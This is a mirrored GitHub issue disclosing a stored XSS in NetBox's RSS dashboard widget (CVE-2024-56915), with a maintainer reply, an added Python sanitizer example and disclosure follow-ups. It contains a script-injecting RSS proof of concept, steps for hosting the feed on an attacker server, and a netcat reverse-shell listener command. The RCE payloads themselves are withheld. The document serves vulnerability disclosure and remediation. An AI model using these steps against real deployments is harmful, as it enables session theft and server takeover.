XSS in RSS Feed Summary Tag can lead to RCE or SuperUser Creation - CVE-2024-56915 #10644

Closed
opened 2025-12-29 21:34:04 +01:00 by adam · 4 comments
Owner

Originally created by @noxlumens on GitHub (Jan 12, 2025).

Deployment Type

Self-hosted

Triage priority

I'm a NetBox Labs customer

NetBox Version

4.2.1

Python Version

3.12

Steps to Reproduce

I've sent a full list of vulnerabilities I've located to security@netboxlabs.com. The report was sent late last year. I've upgraded to the latest version v4.2.1 and I've confirmed each vulnerability. A malicious RSS feed could potentially create a SuperUser or get a reverse shell via remote code execution. For that to be the case an administrator would need to have the malicious RSS feed on their dashboard or have the ability to add RSS widgets, create users/superusers, and/or upload scripts.

`/netbox-4.2.1/netbox/templates/extras/dashboard/widgets/rssfeed.html`

```django
{% for entry in feed.entries %}
  <div class="list-group-item px-1 py-2">
    <a href="{{ entry.link }}" class="text-body">{{ entry.title }}</a>
    <div class="text-secondary">
      {{ entry.summary|safe }}
    </div>
  </div>
{% endfor %}
```

1. Craft an XML file with the RSS Feed Proof of Concept code.
2. Start a python3 web server on the attacker server in the directory hosting the XML file.

   ```sh
   python3 -m http.server 80
   ```

3. Navigate to the NetBox dashboard and add an RSS widget.
4. Edit the RSS widget to point to the attacker controlled IP address and save.
5. Refresh the Dashboard.

RSS Feed Proof of Concept

A general proof of concept is provided below. The SessionID cookie is being protected by the httponly flag. The alternative scripts allow the attacker to perform remote code execution for shell access on the NetBox server and create a new superuser, but I don't believe I should post them here.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Sample RSS Feed</title>
    <link>https://www.example.com</link>
    <description>Example RSS feed with a summary</description>
    <language>en-us</language>
    <pubDate>Sat, 23 Nov 2024 00:00:00 GMT</pubDate>
    <item>
      <title> Blog Post</title>
      <link>https://www.example.com/first-blog-post</link>
      <guid>https://www.example.com/first-blog-post</guid>
      <pubDate>Sat, 23 Nov 2024 12:00:00 GMT</pubDate>
      <summary>&lt;script&gt;alert(document.cookie)&lt;/script&gt;This is a brief summary of the blog post.</summary>
    </item>
  </channel>
</rss>
```

Reproduce the Attack

1. Copy the Proof Of Concept - RSS Remote Code Execution code to an XML file. (not posting it here)
2. Edit the server_ip in the XML file to the attacker controlled IP address.
3. Start a python3 web server in the directory hosting the XML file

   ```sh
   python3 -m http.server 80
   ```

4. Start a netcat listener

   ```sh
   nc -nlvp 9006
   ```

5. Navigate to the NetBox dashboard and add an RSS widget.
6. Edit the RSS widget to point to the attacker controlled IP address and save.
7. Refresh the Dashboard. After a few seconds the file should be pulled from the attacker server and uploaded to the NetBox server. The shell connection should come back to the attacker controlled netcat listener.

Expected Behavior

I do not expect that an external rss feed I've connected to my netbox labs source could create a superuser or get a reverse shell on my netbox server.

Observed Behavior

Remote Code Execution -> Reverse Shell
SuperUser was created

adam added the type: bugstatus: acceptedseverity: medium labels 2025-12-29 21:34:04 +01:00
adam closed this issue 2025-12-29 21:34:04 +01:00

@jeremystretch commented on GitHub (Jan 13, 2025):

> I'm a NetBox Labs customer

Could you please provide your account ID?

> I've sent a full list of vulnerabilities I've located to security@netboxlabs.com. The report was sent late last year.

I'm sorry but I don't see any correspondence regarding this topic. What was the date you contacted us?

Looks like this is simply an XSS within the configured RSS feed, which is not default behavior and would need to be explicitly configured by the user to point to a malicious or compromised feed. We can probably just pass the RSS content through nh3 for sanitization.
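The defect in the template above is that `entry.summary` is rendered with `|safe`, so whatever HTML the remote feed returns is inserted into the dashboard unchanged. The fix the maintainer proposes is to pass the feed content through nh3 (an allow-list HTML sanitizer) before marking it safe. The following is an added example, not NetBox's own code and not nh3: it implements the same allow-list principle with only the Python standard library so the behaviour can be checked anywhere. The tag and attribute allow-lists, the `http`/`https` scheme restriction and the sample inputs are all assumptions chosen for this illustration; the first sample is the summary from the proof of concept in the issue.

```python
"""Allow-list sanitizer for untrusted feed entry summaries (added example,
not NetBox's code). Only the markup a summary legitimately needs survives;
script/style elements are removed together with their contents, event
handler attributes and non-http(s) hrefs never pass, and all text is
re-escaped. The allow-lists below are assumptions for this illustration."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list: formatting only, nothing that executes script or loads
# remote content (no img, iframe, svg, form, object, ...).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "code", "pre", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # onclick/onerror/... are never allowed
SAFE_URL_SCHEMES = {"http", "https"}      # rejects javascript:, data:, vbscript:
DROP_CONTENT_TAGS = {"script", "style"}  # the element *and* its text are dropped
VOID_TAGS = {"br"}


class SummarySanitizer(HTMLParser):
    """Rebuilds the input from scratch, emitting only allow-listed markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_stack = []  # allow-listed tags currently open, for matching closes
        self.drop_depth = 0   # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # disallowed tag is dropped; its text content is still kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and urlparse(value.strip()).scheme.lower() not in SAFE_URL_SCHEMES:
                continue  # relative and non-http(s) links are dropped, not rewritten
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open_stack:
            return
        # Close everything opened after the matching tag so output stays well-formed.
        while self.open_stack:
            top = self.open_stack.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            # Text is re-escaped, so a literal "<" from the feed never becomes markup.
            self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions hit the base-class no-ops
    # and are therefore removed.

    def result(self):
        self.close()
        while self.open_stack:  # tags the feed left unclosed are closed here
            self.out.append(f"</{self.open_stack.pop()}>")
        return "".join(self.out)


def sanitize_summary(raw_html):
    """Return a cleaned summary that can safely be marked as trusted HTML."""
    parser = SummarySanitizer()
    parser.feed(raw_html)
    return parser.result()


if __name__ == "__main__":
    # Constructed inputs; the first is the summary from the issue's proof of concept.
    samples = [
        "<script>alert(document.cookie)</script>This is a brief summary of the blog post.",
        '<p>Read <a href="javascript:alert(1)" onclick="steal()">more</a> <b>now</b></p>',
        "<img src=x onerror=alert(1)>plain text survives",
    ]
    for sample in samples:
        print(repr(sample), "->", repr(sanitize_summary(sample)))
```

In the widget this sanitizer (or nh3, as proposed) would run on `entry.summary` before the template renders it, and only the cleaned string would be marked safe; rendering the raw value with `|safe` is what lets the feed's `<script>` reach the administrator's browser.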


@noxlumens commented on GitHub (Jan 13, 2025):

Hey Jeremy, Sorry. I misunderstood the Netbox Labs Customer identifier. My company only uses the community edition at this time and do not have an account ID. I sent my initial email on Sat, Nov 23, 2024 at 9:20 PM, Fri, Nov 29, 2024 at 11:47 AM, Fri, Dec 27, 2024 at 9:23 AM, Sat, Jan 11, 2025 at 3:33 PM.


@noxlumens commented on GitHub (Jan 18, 2025):

@jeremystretch Were you able to locate the emails I sent to security@netboxlabs.com? The subject line contained "Vulnerability Disclosure Netbox Community". If it's easier, I can put in a new issue here for the other vulnerabilities since they were also in the community edition. I did verify they were also in version 4.2.1


@noxlumens commented on GitHub (Feb 12, 2025):

@DanSheps I've attempted to reach out since November 2024 using the security@netboxlabs.com inbox. Can you verify if the inbox has been receiving my emails? I've sent a total of 6. I apologize for reaching out on a previously resolved and closed issue.

My emails were sent on the following dates:
Nov 23, 2024
Nov 29, 2024
Dec 27, 2024
Jan 11, 2025
Jan 18, 2025
Feb 6, 2025

Reference: starred/netbox#10644